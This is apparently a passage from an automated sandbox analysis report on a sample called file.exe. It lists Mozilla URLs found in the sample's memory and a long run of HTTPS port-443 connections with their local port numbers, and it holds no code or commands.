            Source: file.exe, 00000000.00000003.2076271463.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: file.exe, 00000000.00000003.2076271463.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: file.exe, 00000000.00000003.2076271463.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
            Source: file.exe, 00000000.00000003.2076271463.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 62114 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62137 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61985
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61986
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61988
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61989
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61981
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 62092 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61984
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 62000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62103 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62081 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61996
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61997
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61998
            Source: unknownNetwork traffic detected: HTTP traffic on port 62149 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62011 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 62057 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61990
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61991
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61992
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61994
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 62045 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62102 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62068 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62125 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 62023 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62136 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62150 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 62034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
            Source: unknownNetwork traffic detected: HTTP traffic on port 62093 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 62024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 61994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62047 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62079 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
            Source: unknownNetwork traffic detected: HTTP traffic on port 62113 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62124 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62070 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 62091 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
            Source: unknownNetwork traffic detected: HTTP traffic on port 62135 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
            Source: unknownNetwork traffic detected: HTTP traffic on port 62112 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61964
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61965
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61966
            Source: unknownNetwork traffic detected: HTTP traffic on port 61967 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61967
            Source: unknownNetwork traffic detected: HTTP traffic on port 62151 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62035 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
            Source: unknownNetwork traffic detected: HTTP traffic on port 61978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 62140 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62069 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61975
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61976
            Source: unknownNetwork traffic detected: HTTP traffic on port 62101 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61978
            Source: unknownNetwork traffic detected: HTTP traffic on port 62013 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61970
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 62066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62089 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62146 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62117 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61966 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62043 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62128 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62139 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62065 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62090 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 62031 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 62105 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62106
            Source: unknownNetwork traffic detected: HTTP traffic on port 62147 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62107
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62108
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62109
            Source: unknownNetwork traffic detected: HTTP traffic on port 62020 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62100
            Source: unknownNetwork traffic detected: HTTP traffic on port 61985 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62101
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62103
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62105
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62099 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62009 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61965 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62021 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62127 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62033 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62056 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61976 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62138 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61997 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62067 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62032 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62148 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61986 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62077 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62115 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62044 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61964 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62126 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62055 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61975 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62040
            Source: unknownNetwork traffic detected: HTTP traffic on port 62108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62005 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62041
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62042
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62120 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62063 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62032
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62153
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62033
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62034
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62035
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62156
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62037
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62038
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62039
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62050
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62051
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62052
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62053
            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62043
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62044
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62045
            Source: unknownNetwork traffic detected: HTTP traffic on port 62131 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62047
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62048
            Source: unknownNetwork traffic detected: HTTP traffic on port 62074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62049
            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62051 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62060
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62061
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62062
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62063
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62064
            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62039 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62119 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62144 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62054
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62055
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62056
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62057
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62058
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62059
            Source: unknownNetwork traffic detected: HTTP traffic on port 62098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62070
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62071
            Source: unknownNetwork traffic detected: HTTP traffic on port 62006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62072
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62073
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62074
            Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62075
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62087 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62017 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62065
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62066
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62067
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62068
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62069
            Source: unknownNetwork traffic detected: HTTP traffic on port 62053 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62156 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62117
            Source: unknownNetwork traffic detected: HTTP traffic on port 61988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62118
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62119
            Source: unknownNetwork traffic detected: HTTP traffic on port 62018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62130 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62110
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62111
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62112
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62113
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62114
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62115
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62116
            Source: unknownNetwork traffic detected: HTTP traffic on port 62029 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62107 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62130
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62085 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62007
            Source: unknownNetwork traffic detected: HTTP traffic on port 62064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62128
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62008
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62129
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62009
            Source: unknownNetwork traffic detected: HTTP traffic on port 62118 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62145 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62120
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62000
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62121
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62123
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62124
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62004
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62125
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62005
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62126
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62006
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62127
            Source: unknownNetwork traffic detected: HTTP traffic on port 62007 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62140
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62020
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62141
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62106 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
